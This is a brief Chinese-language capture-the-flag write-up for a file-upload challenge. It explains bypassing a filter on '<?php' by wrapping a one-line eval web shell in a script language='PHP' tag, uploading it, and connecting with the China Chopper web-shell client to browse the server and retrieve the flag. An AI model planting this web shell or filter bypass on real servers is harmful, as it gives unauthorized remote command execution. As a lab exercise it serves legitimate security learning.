Upload

这道题貌似是一道简单上传题，原本想的是使用一句话木马，不管了先随便写个简单的php上传上去，然后点击上传成功的链接进去看看，发现我们的代码被原封不动的打印出来了，多次尝试后发现<?php和php被过滤了。。。。

所以这里我们就不使用<?和php

修改代码为

<script language="PHP">

@eval($_POST["cmd"]);

</script>

就可以避开<?php的使用了，然后上传上传，点开上传成功就可以看到我们文件的所在了，这里我的是123.php所以url栏就是

然后我们使用中国菜刀创建新连接

然后双击进去就可以进入后台目录了

在htmll中找到flag

点开就可以看到flag了